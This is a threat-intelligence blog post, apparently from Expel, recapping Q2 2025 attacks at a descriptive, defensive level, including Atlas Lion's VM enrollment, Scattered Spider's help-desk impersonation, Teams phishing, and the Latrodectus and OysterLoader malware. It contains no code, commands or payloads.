Data & research · 5 MIN READ · BEN NAHORNEY AND AARON WALTON · JUL 24, 2025
TL;DR
- This is part two of our Quarterly Threat Report blog series for Q2 2025
- You can find part one here
- Part two is a recap and reflection of the major threats we’ve observed this quarter
Attackers have calculated the angles, taken aim, and fired straight shots, volleys, and even some trick shots in an attempt to breach various organizations defenses. With the end of the quarter having passed, it’s time to pause and take a look at where the arrows have fallen. In the last three months, we’ve fielded thousands of incidents. Of these, several stood out as unique or interesting. With that in mind, let’s take a look at some of the attacks that got closest to their target.
Eye on identity
In the last quarter, we published stories on several attack groups that targeted user accounts for cloud-based services.
One constant here is that each attack leverages social engineering in some form or another. In some cases, bad actors leverage phishing sites to steal credentials. Other times it’s a brazen call to the help desk, impersonating a target user.
But the techniques leveraged in these attacks varied greatly, which speaks to the fertile ground that identity has become as an attack surface.
Let’s take a closer look at some of the attacks that stood out this quarter.
Atlas Lion tries something new
If we gave out awards for the most creative hack attempt of the quarter, this would go to Atlas Lion. This group is not only well-known for targeting organizations that offer gift cards, but also for having an extensive understanding of the cloud and how to attack it.
In one incident we encountered this quarter, the group managed to obtain login credentials from several users at a targeted organization. But they didn’t just use them to log directly into cloud-based services as you might expect (that came later). Instead, they spun up a virtual machine (VM) in a cloud account they controlled. Then they used the stolen credentials to log into the VM. Since the target organization used Microsoft’s Entra ID, the VM was briefly enrolled into the target organization’s domain.
Fortunately, the organization’s onboarding process required the installation of Microsoft Defender, and the VM was promptly flagged and kicked out. This highlights the importance of having policies like this in place when adding new devices, and points to another attack surface that defenders should consider when protecting against identity attacks.
Scattered Spider returns to the tried-and-true
If any threat actor could be said to have garnered the most attention, it’d be Scattered Spider. The group has carried out several high-profile attacks this quarter (as well as before) and shows no signs of letting up.
When it comes to identity-related attacks, Scattered Spider is adept in the realm of impersonation, and they’re not afraid to simply jump on the phone to further an attack. This quarter, we observed the group making calls to the IT help desk lines of organizations they targeted. While on the phone, they would attempt to reset the target user’s password and get a new phone added for MFA.
Socially engineered attacks like this can be difficult to defend against, especially when attackers are brazen enough to call a help line and speak directly with IT support. It’s essential to have strong authentication policies and security tooling to provide defense-in-depth. Security policies requiring authentications to come from managed devices have been the most successful in thwarting this attacker. Defense-in-depth provides much needed visibility should an attacker gain access to an account. This means having visibility into authentication logs, endpoint alerts, cloud infrastructure activity, and ensuring that signals from those tools are monitored in real time. With that—if an actor’s social engineering is successful—you’ll have provided yourself with means to see and stop an attack.
Aiming at endpoints
Throughout the quarter, we’ve also published intel on the most dangerous threats we’ve seen targeting customer’s networks.
These were predominantly threats of ransomware. The tactics are important to understand because in years past, the same ransomware gangs used phishing as the main means of gaining access to networks. But as public and private entities have fought back, these actors have shifted to other techniques. New tactics require new defenses.
Phishing through Microsoft Teams
Last year, organizations started seeing social-engineering attacks from ransomware gangs that leveraged Microsoft Teams. The attack normally started when users suddenly received a large volume of spam email. They were then contacted through Teams by someone pretending to be IT support, offering to help with the spam problem. But the pretend IT support was a ploy, and instead attackers installed remote management and monitoring tools to gain persistent access to the target network.
This year, the cybersecurity community gained unique insight into the development of this attack: it was originally developed by the Black Basta ransomware gang. This insight was discovered thanks to the exposure of the gang’s private chat logs.
Though developed by the Black Basta gang, the tactic is now actively used by ransomware affiliates on behalf of other gangs (potentially even folks who originally worked for Black Basta). We saw a spike in this activity in April, and this attack technique still continues.
Access by other means
Other than Teams phishing, threat actors are attempting to gain access to environments through infected websites and malicious advertisements. These methods are used to deploy initial access tools (IAT) with the primary intent of gaining a foothold in an enterprise network.
Two IATs known to be used by ransomware actors were in our sights this quarter: Latrodectus and OysterLoader. Both of these malware were developed by well resourced ransomware gangs, who were (and are still) willing to invest heavily in their attempts to compromise networks.
Part of this investment includes using code-signing certificates to make their software look legitimate This is MITRE tactic 1553.002 Subvert trust-controls: code-signing. For more understanding of this technique, check out our analysis of the Black Basta gang’s chat logs and how they used code-signing.
Latrodectus
This malware is delivered through infected websites, which makes it difficult to avoid since the websites may involve partner organizations, or users may stumble on them while casually browsing the internet. The infected websites use a tactic called Click-fix. In this case, the actor is using the pretense of a network connection error, and the message tells the user to press a series of keypresses to resolve the problem. If followed, the user will unintentionally execute a script that loads malware into memory, allowing Latrodectus to bypass several opportunities for detection.
OysterLoader
OysterLoader is being distributed through malicious advertisements. Bad actors have pushed these advertisements through Bing, advertising modified versions of the well known administrative tool PuTTy. The malware itself is known to be used by the Rhysida ransomware gang (formerly known as Vice Society). In targeting administrative users, the ransomware actors can gain access to much of the network as long as they gain a foothold first.
That’s a wrap on Q2 2025
On the identity front, we’ve seen more malicious access attempts blocked by existing controls. Similarly, we’ve seen the volume of non-targeted malware drop this quarter. Incidents caused by the usage of the ClickFix tactic have declined, as has the percentage of Lumma infostealer incidents we’ve seen.
That’s not to say there’s reason to sit back and relax. It’s possible that attackers are currently retooling for new attacks in light of significant takedown activity this quarter.
Attackers certainly appear to be shifting tactics, if the increase in Microsoft Teams phishing, infected websites, and malicious advertisements are any indication.
There were also several new and novel techniques that we hadn’t seen before, including Atlas Lion enrolling malicious VMs.
These are all fronts that we’ll be continuing to monitor here at Expel as we continue to track data, identify patterns, and share insights to help you and your org stay protected.
